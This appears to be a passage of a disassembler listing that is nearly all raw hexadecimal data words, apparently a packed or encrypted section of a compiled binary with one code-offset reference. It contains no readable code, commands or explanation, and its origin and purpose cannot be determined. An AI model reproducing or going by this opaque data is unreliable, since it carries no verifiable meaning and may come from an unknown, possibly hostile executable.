		dd 7985D1F7h, 64F34507h, 0DEE1B5D5h, 508E9C6Fh,	0DDEFE0BEh
		dd 0F7EBF771h, 0AA34CE77h, 9AEDBF6Ah, 7CA53D0Fh, 2606E3E6h
		dd 944432FCh, 0AFC64D44h, 8F8B22FAh, 1DF5B8B7h,	9F3FC4FDh
		dd 0D2AE9FAh, 0E7D1B96Fh, 0CE3EF595h, 0A6D76CBCh, 3E3D461Dh
		dd 1A7A6823h, 0BAE01D1Ah, 2EDC2F0Ch, 36B170C5h,	69F29A45h
		dd 0DCD742F2h, 0F6D47399h, 0F2D771B2h, 5287CF1Bh, 0EC9567BCh
		dd 634DB179h, 0C8386BFEh, 2E32F0D0h, 0E8FF154Dh, 0A27D6F61h
		dd 77137175h, 0D9F5892Dh, 0C7CEF9EDh, 0D172595Fh, 70164FBFh
		dd 27370F77h, 62A0EA67h, 7129790h, 5F18552Bh, 10C4B75h
		dd 0E7F71398h, 2BAF027Eh, 0B719ECh, 6AC9A3B8h, 0D3F1E0EDh
		dd 744B3BEFh, 3BC3B97Bh, 2CB107F5h, 622FE9CBh, 0FC4E9F15h
		dd 0F23CB7E8h, 364FF421h, 0D3FB251Eh, 34DB59C5h, 0B35F8ED0h
		dd 0CDF06B4Dh, 0B33905DEh, 857ADEB3h, 729BEEF2h, 9CEFF2F5h
		dd 4B9DFEB7h, 446E0BFAh, 5F9061C2h, 995BFCCDh, 789BECBEh
		dd 57CDF0D3h, 9233ECA6h, 0DD68C93Bh, 0A1FC539Dh, 0EF7A9CD8h
		dd 0CA4ED6BCh, 0D8F6CFBAh, 60EC68BAh, 0C6F1C79Eh, 53B99247h
		dd 177A6F37h, 0AB598D87h, 0B6353A56h, 4B77E0DFh, 0D7F73BE4h
		dd 0B06D5F3Bh, 0B154BF1h, 240F64Bh, 0D339FDD1h,	0F55F9E97h
		dd 0A3772927h, 87C9F512h, 5F28DD66h, 0ED56BCB2h, 0BDC1DD0Eh
		dd 3AA57D63h, 0FFC8B992h, 0A53FDF07h, 0CDEAE067h, 0A1CC53A8h
		dd 0C9E4C725h, 0D19C781Ah, 0F97D8713h, 0EF5E60A8h, 0C456C11Fh
		dd 0BD8F77DCh, 86D32111h, 0F1B0A3C7h, 141F40CEh, 0BACD945Ah
		dd 0E9D46D99h, 1CE9FB72h, 0CCBDCEE3h, 856A48CCh, 0C3EFD49Ch
		dd 7ED673A6h, 6745B815h, 78AD9704h, 8E9EB599h, 0A2561B28h
		dd 964A59Fh, 0E49676F1h, 94FA9693h, 9D6BCDA6h, 0ACC19EBBh
		dd 0EF7398Fh, 0FBF4349Ch, 0D9EF0AFBh, 0B55771A3h, 37F53E22h
		dd 8A31C8CFh, 0D96C0C1Ch, 38FD4EA5h, 297D5FD3h,	0C77B7C1Bh
		dd 0E9728885h, 0DD373FCEh, 190B209Dh, 4A3D61D1h, 4E72BDE8h
		dd 16C1E021h, 5E16E3F3h, 0FECC169Fh, 2A3B14D4h,	69FDC153h
		dd 0A670742Ah, 0DE8F9785h, 0AD2BF58Bh, 0C062B591h, 364A008h
		dd 30F710F9h, 8C5A40Ah,	9E97FE49h, 33F736FCh, 0B1FA667Dh
		dd 12AECD24h, 2C031830h, 89154BECh, 24A4FEE5h, 0A8A05520h
		dd 601F48AAh, 2A1964h, 8C03FD08h, 8067019Ch, 0FFE8FFA2h
		dd 0CCC02B00h, 2806A019h, 0FFE3FFAh, 0CB73B0h, 0FFE88415h
		dd 6A604B00h, 1403A019h, 3FF1FFDh, 65B12D6Ch, 4A09A280h
		dd 1A1B8055h, 542D2F5Ch, 7C9C108Fh, 61D9A4A6h, 0BA491FA7h
		dd 0BC0DF713h, 0C8353E95h, 0E0FDCE27h, 11E97FC3h, 29CA7FCFh
		dd 0C05EA6CFh, 939E9012h, 0F4AF26FBh, 4A07BF67h, 7632089Dh
		dd 3F0482D8h, 413C10CCh, 87EDD97Fh, 931AA73Ah, 0AC953386h
		dd 3E7CDFC7h, 8AE4D2BFh, 9733636Bh, 0DEBFC6F2h,	80F58DAh
		dd 1A1F7B3Ch, 0CCB621Eh
		dd 0D6CE5669h, 0E90EF16Fh, 6C7E5FD7h, 0A0BFD27Fh, 9AA7685Fh
		dd 1D5F8E87h, 0A974C331h, 0E061A7DFh, 9C372BC7h, 4E6FE2F0h
		dd 0F5355F26h, 66D70F8Ch, 1857DB1Ah, 0C055405Ah, 0B2572F8Dh
		dd 24CDCCC4h, 4335BF9Eh, 0CD2E44EDh, 0EECEE1A4h, 8C6CF85Ch
		dd 0E9EDFB78h, 663D74D8h, 7533D250h, 85718A96h,	80346567h
		dd 0C2A66542h, 6AE92BDEh, 77717ED6h, 1D9D9EDEh,	6A4D1E07h
		dd 0DB2EBFACh, 767CAFF7h, 0A806951Bh, 87E7CEA7h, 5F3952DCh
		dd 8859C97h, 60D88D95h,	0DD012A2Fh, 1DFCC7E0h, 2011C003h
		dd 67857C6h, 91F8CF55h,	0D2F267AFh, 0B2A66CE1h,	962993B2h
		dd 5536CC2Eh, 0E2943CF7h, 1E59CDD4h, 45FE5D1Dh,	569B63B9h
		dd 3AD1A76Dh, 1D2DC6F7h, 7111864Fh, 84AEB66h, 0E1315C30h
		dd 1EE68CCDh, 241172D1h, 0F73C7A8h, 3C765507h, 0CDE4414h
		dd 68700E09h, 3BDF8486h, 80C06715h, 5B586336h, 5D9F288Bh
		dd 1B5C05DDh, 0E5C44B1Ah, 4FFFAFCBh, 2A21703Ch,	0EC50BC99h
		dd 4D831C22h, 64154A9Dh, 0E4D0D0EAh, 18088753h,	0B02E020Fh
		dd 496C8Eh, 2864121h, 21178F8h,	967C63EAh, 7895B071h, 0E2564042h
		dd 95E312Ah, 258884AEh,	967112BEh, 5B044B28h, 6E122D42h
		dd 0C04BB689h, 312EDE25h, 0C4BC8897h, 12FEA25Dh, 0F921897Ch
		dd 30942508h, 4253104Ah, 9508129h, 255004A7h, 958112A4h
		dd 57444AB0h, 61122B62h, 944BAF89h, 912DC625h, 4B63896h
		dd 12E6625Bh, 4BC08970h, 2FA225D8h, 88FC97B1h, 25145F84h
		dd 9491D086h, 53444A38h, 50122962h, 484AA789h, 412AA225h
		dd 84AC9895h, 12B8A255h, 4B00095Ah, 2C622578h, 0B3099621h
		dd 0D4255904h, 68966812h, 25CAC4Bh, 976E12Eh, 25E484BAh
		dd 97D112EEh, 69484BD8h, 23202014h, 94C1AA40h, 53C44A50h
		dd 521229C2h, 584AA809h, 0D12CA825h, 84B2C895h,	12D60258h
		dd 4B900967h, 2E8225B4h, 0BB899731h, 28915D84h,	10847812h
		dd 45121FAAh, 244AA189h, 0C1298E25h, 0C4A85894h, 12AAC253h
		dd 4AC88953h, 2BA2255Ch, 0B10995A1h, 6A5804h, 47C86412h
		dd 97C47D9h, 7E100479h,	0C44A12B4h, 0D8C8BC25h,	0F30167C9h
		dd 7619D0Ah, 1C1F6B8Ah,	0E2F958A9h, 0E29AFFDh, 0AA3C8713h
		dd 6A987348h, 0F0A500C7h, 7881BBACh, 0C62ED26Bh, 180CFD6Ah
		dd 75AD200h, 36874A4Dh,	92855BB7h, 0A423EFA2h, 86C08A4Bh
		dd 0F5F83CBh, 0DFBAFB54h, 0D8B2BE77h, 0DDDBF9EBh, 652C7243h
		dd 88163178h, 2DC50923h, 6E568213h, 0BEDDE1DDh,	1724CB6Dh
		dd 3AAE2EB2h, 596F4687h, 6381554Dh, 0D02604C7h,	98B26481h
		dd 708E06A1h, 7211C019h, 80A46B40h, 52F8EB84h, 0CCAED31Ah
		dd 4E870313h, 1847FF1Dh, 0C1987B3Dh, 96497B98h,	7A198214h
		dd 0FE6D2786h, 0DC3D5A86h, 55C51A97h, 9FCC16F0h, 74D0D524h
		dd 917F6D4Bh, 0A0E9854Ch, 0E63F59C2h, 77A05DDFh, 0B589D8A8h
		dd 0BF9DDB18h, 7A280DFFh, 5203E0B0h, 77D1009Bh,	2903433Dh
		dd 300C69E0h, 18109612h, 0AE7307CAh, 3C491A12h,	0EC50AA30h
		dd 80A3893h, 4E7FE156h,	60772613h, 41A10434h, 804D94Dh
		dd 0BF062B44h, 0E1F13D7Fh, 7E8D83DBh, 604BFF8Ch, 0F83CFF34h
		dd 4580E2F3h, 0E84CA08Ch, 2BD57FD5h, 79CB4DE0h,	7F7CEFFCh
		dd 85FDFB4Ah, 86BE277Fh, 7FD67FDh, 0C4FC8458h, 5FED7C84h
		dd 979FDFA2h, 0F6FFA684h, 2FE6FBEBh, 24600A1Ch,	2DA1F09Fh
		dd 2FFAD2F0h, 87F433E7h, 0A1EDFD82h, 0B130D7DCh, 0D628018Fh
		dd 7562B8B1h, 559E24EEh, 2A6AB59Bh, 6AEFDD47h, 92E79374h
		dd 7DD554D6h, 0DC52F03Bh, 0A93B2BBFh, 92ED48F5h, 947530C7h
		dd 39581FD9h, 29DECD27h, 320604DFh, 0F3F815F1h,	0BF17B9F9h
		dd 0BC583CDEh, 77DFB7Bh, 0BEE78318h, 0B7BBB8BCh, 70EB0003h
		dd 0E06B726Ch, 0C66B765Ah, 7545435Dh, 7FDAB8B7h, 0CFD513F0h
		dd 230D5964h, 5603A100h, 0DDE8EC0h, 0C8DE1F82h,	9829E373h
		dd 0BA51ED89h, 19BCF35h, 2A82838h, 0C730FE50h, 7450AC02h
		dd 1C2EDEDBh, 5002D002h, 0BE270F80h, 98E580C9h,	0BC2ABBE7h
		dd 0F7249925h, 1B01686h, 41508AF3h, 8566E1EEh, 0CBDCA8DBh
		dd 8B40EF9Bh, 341B0342h, 2C1B8612h, 0F0E8068h, 5E36E154h
		dd 5C2E56F0h, 1808FCF0h, 3A754D8h, 311CE05Eh, 583034B9h
		dd 1BD51080h, 0BBDF4D59h, 1BC57399h, 0EF37EEB7h, 4E508FCDh
		dd 0BF306E59h, 0A93DDF2Ch, 0C020A728h, 241B2C2h, 4A292C42h
		dd 0D9A8287h, 1BDDA73h,	58603CB2h, 473D31CDh, 0F016DE01h
		dd 80A665C0h, 50316DCDh, 3A1E964h, 7DCF1645h, 0F8386713h
		dd 20D10D4Dh, 79BD6E02h, 0B050F241h, 9F40030Dh,	800A1ADBh
		dd 4DF9E2CEh, 2C0A1905h, 0C403DF0h, 0A173A0D2h,	0CD80AC0Ch
		dd 0E3FFB83h, 4FDABDCh,	7492378Ah, 0C72FEE7Fh, 0DEE3376Ch
		dd 299CB88Dh, 2B16F039h, 820E14EEh, 0C334A713h,	121D004Fh
		dd 60F7D763h, 0CB0DCE3Fh, 0D0887792h, 685AFC81h, 4184D22Ah
		dd 0C41D20A0h, 5BC4011Bh, 79120C42h, 0CC04B989h, 7F905F25h
		dd 33520404h, 0AB3DA030h, 0A3AACBF2h, 0EFC0088Eh, 9BF0BC1Dh
		dd 6D5D231Dh, 8F6878B4h, 0D46BE6C7h, 0DE4C4FDEh, 0F484F157h
		dd 50B2477Dh, 0FD2B27EFh, 0FAF5D49Ch, 0BD38FB37h, 4BB393F7h
		dd 412659A4h, 0EB819129h, 0FA3F9FBDh, 0DBCC1382h, 8D082BB6h
		dd 10F503BBh, 73A68EBDh, 97528ED9h, 3AFDBECh, 896F65Ah
		dd 0D2D1506Ch, 7225EB3Dh, 0AAB75F2Fh, 2D66F26h,	0A6C64631h
		dd 3102FB3Dh, 0B9F3C3EEh, 7C52CEBDh, 1636AF7Eh,	0DB64D821h
		dd 6A141CFAh, 618DB655h, 0C62C413Fh, 50AA2894h,	2695F293h
		dd 85CA23B5h, 0A5514E61h, 1868D54h, 2550B315h, 0B95C9154h
		dd 0B54EA4AAh, 0E96F8C39h, 0E780684Eh, 9E53B833h, 4647C0C2h
		dd 0DAF3ACB7h, 0C7CB6630h, 0DC337361h, 0DCDA1D86h, 87060549h
		dd 1C567179h, 31408266h, 807F24A4h, 22002445h, 75FCh, 0
		dd 80000000h, 434A0043h, 1000h,	0
		dd 20F33010h, 32289FF4h, 0A78063B4h, 1184605h, 8533D094h
		dd 11842601h, 0D2D765B9h, 5B8A5B26h, 73297590h,	0B1261228h
		dd 0F65BA536h, 0DE7EEA7Ch, 0C522C36Eh, 542F414h, 4A65BCE9h
		dd 0C2B69B15h, 0C8B93BCDh, 5892A81h, 0CB7D8CEDh, 90917377h
		dd 324C7051h, 6F169057h, 6114AB5Ah, 4F5D2EB6h, 1B650458h
		dd 141843Ah, 8C190485h,	29A52B00h, 8DC12C2h, 25944B48h
		dd 930C3A00h, 35D6E6D5h, 0A355394Dh, 1A5B0D9Ch,	0B50ADF78h
		dd 6934FA04h, 8952ADC8h, 0F8C03EFBh, 0EE112200h, 2 dup(0)
		dd offset loc_439000
		dd 29DD434Ah, 2, 703E0000h, 9B7F20D6h, 7FFF9F7Eh, 91B277F4h
		dd 76CAD58Ah, 0CC7CDFDFh, 41071F83h, 4BCB2024h,	4FB81FCFh
		dd 3014E3B4h, 723137B8h, 0E02E12E3h, 9EC2745Fh,	0F85A12DEh
		dd 246D7021h, 0B51069F2h, 0D424131Dh, 24AE8834h, 0B442BBF8h
		dd 69012B99h, 93A10A7Eh, 0ECAEF130h, 0A03681ECh, 0F3D8D14Eh
		dd 0F70A7FA1h, 0CB501F54h, 2AD0473Bh, 7F3EF130h, 0A6797A7Fh
		dd 0E5780055h, 3EFC0597h, 0EF8985F2h, 9B0C68B6h, 6D911F04h
		dd 0E9B6470h, 0D4B12DC6h, 3C52A4D3h, 0F3477D7Ch, 2AFE4968h
		dd 4DF4EDF1h, 0F43907DFh, 447797Ch, 364B3C2Ah, 0D148FF25h
		dd 11CEFD18h, 86923D50h, 6833D2D2h, 9262B9F7h, 0BDF0F34h
		dd 4067FAC2h, 0AC60F767h, 88ADE7C0h, 5FD17910h,	1C87069Ah
		dd 4529708Fh, 83017FCh,	0D9CD52CEh, 6A76DEF5h, 0B019EE12h
		dd 0F003701Ch, 5366A62Fh, 0DE3B948h, 0ADD6908Ch, 35A3C821h
		dd 83619FBAh, 1F1D117Dh, 2BF3AB78h, 0FEE94BA1h,	6B29C3CEh
		dd 9BB5E446h, 8587766Ah, 0C0CC8CE1h, 49229207h,	85B09482h
		dd 443F7542h, 57FC7C48h, 40436E0Fh, 0C3F00354h,	9B4BE4FAh
		dd 0E9C19C68h, 5A68B412h, 43FBE147h, 880395C8h,	4087FDC5h
		dd 81E927CBh, 140ADFAFh, 9027FC25h, 28E0348Fh, 0A0FBBF8Dh
		dd 2B0D2A6h, 4A86224h, 3FA468FAh, 7FB65DD4h, 18AAAF48h
		dd 9DA31385h, 0D2D495F0h, 69190907h, 2C4BEB42h,	0A8E2065Fh
		dd 2D1817ECh, 9BA9547Ch, 1AB7CC9Ch, 21A381E8h, 0D5ED5B2Fh
		dd 1C2BB2B6h, 962812D9h, 6BBCA587h, 6F02047Fh, 58D91E3Ch
		dd 0F3C953E5h, 0F0FBE470h, 12FA208Eh, 7C5F0A01h, 8E7F264Bh
		dd 1E04C1BFh, 51A47B7Ch, 51261FEEh, 878E8903h, 768CFBADh
		dd 2B56492Bh, 0EFCE4C9Bh, 2FC4AC81h, 1BE4F472h,	0F95EED6Ch
		dd 1E1935ABh, 2932E3FCh, 0A2D04345h, 1DC92BA6h,	0A874A365h
		dd 511CE32Dh, 6CCA7802h, 1DA4DDFEh, 5A0C2617h, 385AFCD2h
		dd 0DAC7370Ch, 3AD8C02h, 5A287F13h, 0AF4E9BCEh,	0BD19B9FEh
		dd 7A38B40Ah, 16981890h, 392944ADh, 0BAF27E0Ah,	0C2DB5105h
		dd 0B81E802Ch, 22CC9402h, 68243A7Dh, 7BAA19B5h,	0D3522FFAh
		dd 82A0DC96h, 0E004A331h, 3B87A133h, 0F1F5EF0Eh, 0C737E6C3h
		dd 739299EAh, 32268B83h, 0F6E56696h, 0FD0E31E2h, 0C4B3179Bh
		dd 0EA2C9981h, 0FAC423C5h, 8B89909Bh, 45315253h, 291F6771h
		dd 0E17F1948h, 1409F802h, 0AD421FE0h, 0F0065855h, 8DAF0969h
		dd 5BFD3E96h, 0E2F92569h, 0EC8B26FBh, 0D647D5E6h, 54BCFAC0h
		dd 7D5C206Bh, 0E2607063h, 7F3AE010h, 1ACBED68h,	0BDCB99E8h
		dd 7842F60Eh, 0E399B228h, 0D0A54D73h, 0C34172D6h, 82B2CE72h
		dd 0BB6D6533h, 47942813h, 0B4AE4555h, 829F280Bh, 0AFC8E2C0h
		dd 24CC558h, 8C901D7Dh,	0D47F0A34h, 7CD8BCD6h, 3231AD14h
		dd 9B96E5D3h, 1E32BEF2h, 3F0B37EAh, 0C0415DECh,	0B3FB17B4h
		dd 26857A5Bh, 3BFBF481h, 816C9668h, 0B119E48Ah,	0B76D62E6h
		dd 5EA9FBD7h, 1FDDF2EBh, 34D7B359h, 0A168AB93h,	0AEF67E2h
		dd 8DA06Dh, 0F3303EFDh,	8ACACE6Ah, 5AEDFC5Ch, 0C569B23Bh
		dd 0C81C55BAh, 6D03B298h, 4957D9FFh, 76CD4536h,	0E03C38EAh
		dd 107D8870h, 64309A31h, 7A640D99h, 0CBB2762Bh,	3EB6425Eh
		dd 0A9BC2C0h, 87B90955h, 27B2F5BFh, 0C0E6CDD0h,	3D5CA02Dh
		dd 4BD16B45h, 0F333697Fh, 0B818148Eh, 0C5A4FBCDh, 44231069h
		dd 4D7E50CBh, 4C0D86D8h, 132EA6B9h, 0D052572Dh,	9C9AA291h
		dd 0B9111259h, 0C370C3EDh, 0B296A0FBh, 334A1BF8h, 0A032A19Bh
		dd 0BF07B6A6h, 6D14BF2Fh, 0F1B79717h, 7737D743h, 0A5BB2FD3h
		dd 0DA0E02FEh, 0D4617F7Dh, 155A181Ch, 0C4126B1Ch, 6E2F6E77h
		dd 0A3968h, 6C3FACA2h, 0AC35345Fh, 0E351091Ch, 7DD2B65h
		dd 6362BF5Eh, 0F595B3E9h, 6DCA295Fh, 1A7921C0h,	19CB1C74h
		dd 79437147h, 35034493h, 0FE7D09EBh, 880E8D85h,	3FC9C080h
		dd 80E37F53h, 12108552h, 3DA94C7Dh, 561D5CFCh, 0EEF8084Fh
		dd 0CE2DE8BAh, 2C7C579Ch, 0C6004D62h, 5046A39Bh, 8F7C4164h
		dd 0B8408D4Dh, 0E0D20B61h, 20E29B3h, 0F307A2FAh, 7364097h
		dd 938C351h, 0A5A2DEBEh, 0CFC0544Ch, 38B0F961h,	0E92E6A67h
		dd 0D3B2712h, 85801FA2h, 78DCB59h, 0E7774AC6h, 0C0935B88h
		dd 0D4F1AB02h, 0DDA9EFDFh, 0D79F7D80h, 0B6B15600h, 0A18BEAE1h
		dd 3ACD8EE0h, 550882F3h, 0FDC06A42h, 44808D94h,	168034D3h
		dd 0B9A1B2A1h, 8D40A268h, 0D772104h, 64DA80BBh,	70BFC0F0h
		dd 79009A6h, 0C2CB8647h, 60307080h, 5EDA0A92h, 4C23F0C1h
		dd 289E4254h, 0FAB3D472h, 7BC08B4Eh, 0D50199C2h, 938EA645h
		dd 24805A1Eh, 8DE2B120h, 2A00DF47h, 0E305CEFCh,	1C2A4BE5h
		dd 27E2E4EAh, 15EB6E4Ah, 0FAA3A608h, 92E9C8DFh,	5E0B0A3Eh
		dd 4292344Eh, 0A4B53F38h, 28F9D56Ah, 0ED50DA5Ah, 250FA9D4h
		dd 7C5EE2E3h, 58E4B560h, 0F623739Ah, 77842E2Bh,	20F44022h
		dd 68C6DCE5h, 10690F95h, 4263C716h, 998E63Dh, 0EBABE9E8h
		dd 0A9E6109Eh, 0B48E4093h, 8E346260h, 31458504h, 22E2BDFBh
		dd 0B4CA5208h, 927CBDB6h, 4ED1F835h, 69BB0815h,	0F2EF9BAh
		dd 356075BCh, 9E5383B7h, 3549061Ah, 0CF153203h,	25851E07h
		dd 0ABC98EBh, 0F4FAF8FBh, 0A0A1E3B8h, 227F3554h, 2885A3A6h
		dd 8CE5BC6Bh, 2533CFCDh, 0B9405403h, 61E41F95h,	0F89DF2B7h
		dd 0B99AE321h, 0B5B1659h, 65BD19CFh, 15D474DCh,	0AFEE7970h
		dd 0AA9258D2h, 58BF3027h, 36FAAD84h, 0B8C20F97h, 0F6AF994h
		dd 17CAB2C5h, 0B0A8CD47h, 0BA7A01D6h, 0E84D5374h, 15353799h
		dd 0D7D65ED1h, 3CFAB6BDh, 51550FB0h, 0EA6EA4A7h, 968E5890h
		dd 3B86E5B8h, 83D92ED8h, 0FC218D6Ah, 0B2A69699h, 2209E73Dh
		dd 54A88D02h, 0EE788153h, 0C13ED31h, 43735785h,	52DC16A6h
		dd 9DF5EFEDh, 0F5E24B9Bh, 0FA4746D1h, 0FEB0D0C0h, 0D02FA2C3h
		dd 6B613F32h, 9F0A16C8h, 4FFEBA43h, 0A543465Eh,	79BC586h
		dd 83C813D0h, 81BA6D8Fh, 6BDF8982h, 0CD06BEC2h,	0FA62690Ah
		dd 92E6E1E2h, 0DADF9368h, 3142F491h, 9C8F04F4h,	96814353h
		dd 0C0374F42h, 5A165339h, 0E79D37D6h, 0E3355D80h, 10C1B487h
		dd 418271C8h, 6B826BE4h, 868CDA05h, 6315158h, 5FED4ADh
		dd 0A7C91E8Fh, 0B0CC6D2Ah, 6A90FEB2h, 1408C769h, 7E5FA81Fh
		dd 0E29F3E95h, 51D6ACBCh, 0C71644A1h, 3F1D5A14h, 0A9537068h
		dd 0B3B9EEBBh, 0E37F5A56h, 95668D74h, 4F1D101Dh, 0BBBC14FEh
		dd 0A0CCB9C9h, 78B8A741h, 553CD56Ch, 0E3B97DAh,	0EA96D205h
		dd 7D4F00ACh, 0C0ED8E8Ch, 214C66DDh, 0DBC4440h,	0EDECE237h
		dd 22E1FA08h, 20B052D2h, 0C580B2D0h, 957559F8h,	0D51C6564h
		dd 0F41FC4CAh, 3D4D3B55h, 0FBA7C078h, 0DEA22A50h, 1E3CBFF4h
		dd 14FE8507h, 3614D00Dh, 0EA4705E4h, 0C0FE862Eh, 5F540FD9h
		dd 65DA3A56h, 1B65A416h, 6FF7E87Eh, 0F5BD9808h,	44FFE3EEh
		dd 481E8BA6h, 983E909Eh, 0E7FE628h, 3D551450h, 166008DBh
		dd 681690ECh, 0C008443Fh, 0B5F68D4Dh, 0BF7444D2h, 79105201h
		dd 0C4CE138Ah, 73969044h, 7E03C0D6h, 70B1128h, 0EC225593h
		dd 55E41EBh, 0A0750D58h, 0C56FA4BEh, 0C1E366E3h, 0B5CA3AA0h
		dd 7ABE99FBh, 0A2CE3F93h, 903F423Ch, 45145CFBh,	34B6EDA3h
		dd 8980A289h, 8EDC0F89h, 63C2EC43h, 0D64E4537h,	0B8DBE456h
		dd 0B8AD09DEh, 0A5C802BFh, 65960CA6h, 553608DBh, 995E9F83h
		dd 581E7E47h
		dd 4F44A9A6h, 3E870E42h, 5692F839h, 9414FB5Bh, 0B1E5295Dh
		dd 59E932B0h, 105BB2D1h, 81C9B14Dh, 2C526C8Eh, 8E263C83h
		dd 60F9F7Fh, 0EB03ABECh, 9F48A6E7h, 0A73F1309h,	0ACA00F01h
		dd 0A671D5C2h, 59546568h, 1C6F4019h, 30AAD06Eh,	0F3A6DE0Ch
		dd 0EEE34E07h, 0BF39CE79h, 9EC99B70h, 0AB4A3457h, 96B71442h
		dd 0F6DCCE62h, 31ACFA93h, 0C72461BFh, 20812852h, 5A0D5035h
		dd 9CBAC0EEh, 81114FF6h, 31B9C707h, 8DBCC0F2h, 0F65A4CCFh
		dd 6E710C7Ch, 420AB99Dh, 90C4CD9Dh, 0AA475A5Ah,	142AEC64h
		dd 14AC36A7h, 0A187B36Eh, 20BA9FDFh, 0BFAB52E1h, 0F3A18C0Fh
		dd 29F89690h, 0C068F8DEh, 36F1279Bh, 0FD37C04Ch, 33A2E2D0h
		dd 0C01885FEh, 0FD2D9D1Eh, 0B89B5E65h, 90FC7C0Ch, 0EEA35A70h
		dd 9B6D56FAh, 9C20511h,	5BC2B1C7h, 0AF792A41h, 86DF947Bh
		dd 0A95D5C9h, 52EC6945h, 9A97E150h, 0BCFD25Ah, 5A334541h
		dd 1A1A6AA9h, 5124F1E5h, 6028197Fh, 0E13BA8EDh,	0B7CF9B86h
		dd 1262B95Bh, 0EBC252E2h, 0A77CF902h, 2B55CF83h, 0B595E221h
		dd 62FA0386h, 0DECA5F97h, 0F018AB79h, 46A7A943h, 2BBE5DFFh
		dd 0DF56D18Fh, 0AA7C1CC8h, 0AF7F67E9h, 0B8EBF454h, 0DDADE06h
		dd 73C54DA7h, 0E4625CBEh, 36130802h, 9BFD0A52h,	54BFE805h
		dd 0DFD41D64h, 9531B3B8h, 0CB9A1269h, 66003E87h, 163B66EEh
		dd 0F01B57BDh, 0D31682D9h, 36A722F9h, 0D280DF4Bh, 0AF2586E8h
		dd 204B2BDDh, 160F1796h, 0D1F64519h, 0E09AAD5Bh, 0AAD1F358h
		dd 857D39BCh, 0D4C6BCB4h, 3479DF44h, 0F40DEA3Eh, 0F36A2C32h
		dd 0B2C099C2h, 0CB6E6E1Bh, 0A787C660h, 1B2A36CEh, 0FE0D8BADh
		dd 0B38B0621h, 8DCEF316h, 5A264B39h, 27D92C63h,	0AD4520Dh
		dd 52E54A9Ah, 9D87A409h, 0F43A0961h, 0B8DFC86Fh, 7397267Eh
		dd 8207A828h, 0C216AE0Fh, 0F83B8BAAh, 0E2BFABh,	283BEACFh
		dd 89165777h, 0F53D4E96h, 7CF0AD5Bh, 0D128F380h, 4F9343F6h
		dd 0A1C05F09h, 0C047C87Ch, 0FD0C4DBCh, 0E38BE094h, 0FEFC0F66h
		dd 0D7C9CCF7h, 0D3311DE5h, 48C76B05h, 59ACE6F9h, 256BA152h
		dd 0C96E14E5h, 0ACAEBAC6h, 0E5F1A480h, 9A787D81h, 0B0A73A39h
		dd 73A7D2C9h, 0B3AD3E7Bh, 3058E020h, 0CF59995Ah, 1FC60A28h
		dd 88E16A98h, 8B1312EFh, 74550756h, 97CA05FAh, 0FE9C392Bh
		dd 0F1318699h, 0F8E6516h, 0D628573Ch, 0F5163BBFh, 5F3B5670h
		dd 0D6E3D9BCh, 37A203E9h, 11B56B15h, 0ED1840A3h, 0FEFE38DBh
		dd 3D07940h, 62C7664Eh,	8C255C0Fh, 418576D4h, 0B029F359h
		dd 0ED864ED5h, 882ABE38h, 0A68169D3h, 0D7F50010h, 531701A3h
		dd 0BCD8FB9Ah, 2C850941h, 949212BBh, 0CF48DA10h, 0CA5132Dh
		dd 7AFD08B0h, 9434363h,	0CD8CD60Ch, 0FD7C6753h,	0CA921533h
		dd 8DFB3B6Ch, 20FC628Eh, 74F64217h, 0BBB81747h,	0DFC33630h
		dd 546D9DD6h, 0DE128CDFh, 0E0921E3Fh, 0A5B15359h, 0FA1A7E6Ah
		dd 117CD3F2h, 71C09BADh, 4FCEB722h, 0BDF5A7C6h,	775B6368h
		dd 0B0BE33DBh, 52D985FEh, 2ECD8814h, 48952452h,	57857381h
		dd 0B1BF07C3h, 0EC7BFBEAh, 47FAB816h, 5FDF9C3Bh, 1F8B5C20h
		dd 5D3184A2h, 0AC8CBB65h, 9C50ACB5h, 0D64FCAADh, 9A6B8682h
		dd 1D6D7AF7h, 17CDAB67h, 0B0EFBCA3h, 0F301C4C0h, 8941CCC7h
		dd 9AC938F8h, 5A20222Ah, 5F133CC2h, 0FE5B767Fh,	0DA3503E0h
		dd 0A359A2CAh, 224A67B6h, 89FD38E8h, 3A5C266Bh,	0FA4479A5h
		dd 51485D7Ah, 0FA05A461h, 0DDB6AB41h, 619F817h,	0F27E47F6h
		dd 41113D75h, 1A95F995h, 3C03557h, 4538A2EDh, 0CC13E8EBh
		dd 0C5885C4Bh, 7600505Fh, 0BD70E866h, 635A615Dh, 0ED9EDD03h
		dd 0B9E3D53Fh, 6A9BBF71h, 91CEF8ABh, 0D376C834h, 24A38A00h
		dd 0E466F309h, 0B16618Ah, 0C69B61F8h, 9DE9CD43h, 0B85B9308h
		dd 60D2E151h, 0CF29C272h, 624A0D6Ch, 0FD71F6A4h, 4E802533h
		dd 5D055313h, 91B581FCh, 0DC3EACE7h, 76C00D7Dh,	0B93C8972h
		dd 41FA2B68h, 7835C25Dh, 8B49B906h, 638388AAh, 9919FDF2h
		dd 4E479260h, 9C18BE2Ch, 1041D466h, 0E1F8317Dh,	642ACBF0h
		dd 9DBDF39Fh, 0A9E3168Fh, 2D9C6844h, 0E2ADD452h, 0F489F40Bh
		dd 47E779B0h, 102AF4C2h, 956B5054h, 0AF60D68Dh,	1EA67173h
		dd 5FCD7DD3h, 0CCF59E2Ch, 0D90D799Ah, 381AC5F9h, 5298E572h
		dd 46D8356Dh, 0B302C76Fh, 622ED29h, 221F0D5Eh, 8FF018DDh
		dd 0FF9B7EBCh, 162F0A33h, 0BB6D96F5h, 20B7E18Ah, 839F0083h
		dd 7D0681C1h, 0FF955BFEh, 868BE427h, 3F09CCB6h,	8BF1673Ah
		dd 5845F061h, 0F5B4B6B5h, 6D20BA07h, 9F074B73h,	0C0FEDBAFh
		dd 2A6B8119h, 7C383B39h, 87058ED4h, 66A220B8h, 0B443D353h
		dd 398BAAC6h, 0D6F58E0Bh, 6EF85884h, 0A50B602Ah, 363397CAh
		dd 7420F56Eh, 10FECA04h, 0F046697Ch, 46563548h,	1771A3EFh
		dd 2FF79C5Ch, 239E6316h, 1BEE6EE3h, 1BA3FE5Dh, 0FBC57E83h
		dd 0DE9CBC97h, 678FBB97h, 4A6A0FFAh, 38AA48DFh,	0C161F898h
		dd 0BB23CE3Dh, 0D08C44E2h, 0B8CEB45Ah, 797B67CFh, 99F64407h
		dd 3E314CC6h, 1497540Dh, 4272C263h, 0E319A88Ah,	1B030861h
		dd 0F332C85Fh, 59B8D583h, 0B85ABF60h, 2C17CBF1h, 96B7B7F4h
		dd 0B4F6873Bh, 8E75427Fh, 995EC592h, 124E4E23h,	162D3BB3h
